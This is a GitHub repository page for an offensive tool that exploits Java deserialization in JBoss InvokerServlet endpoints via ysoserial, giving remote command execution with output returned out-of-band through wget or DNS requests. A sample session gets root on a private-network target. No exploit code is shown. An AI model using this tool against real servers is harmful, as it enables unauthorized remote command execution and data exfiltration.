Skip to content

9andrea1/InvokerServlet-exec

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
dns
dns
 
 
wget
wget
 
 
README.md
README.md
 
 
ysoserial-0.0.2-all.jar
ysoserial-0.0.2-all.jar
 
 

Repository files navigation

InvokerServlet-exec

JMXInvokerServlet-EJBInvokerServlet serialized objects command execution

full credit and details at the following link:

https://github.com/frohoff/ysoserial

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

this script lets you execute and retrieve commands output (through wget or nslookup requests) from a vulnerable target like in a shell.

Example

root@kali:~/script/InvokerServlet-exec/wget# python cmd_shell.py 192.168.1.20 
$> id
uid=0(root) gid=0(root) groups=0(root)

$> exit
Bye!

About

InvokerServlet serialized objects command execution

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 2

  •  
  •  

Languages